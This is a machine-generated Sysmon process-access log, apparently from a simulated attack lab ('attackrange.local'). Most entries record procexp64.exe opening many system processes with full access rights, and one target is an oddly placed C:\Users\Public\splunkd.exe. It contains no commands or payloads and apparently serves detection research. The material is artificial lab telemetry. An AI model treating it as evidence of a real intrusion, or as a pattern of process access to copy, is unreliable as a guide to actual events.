15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 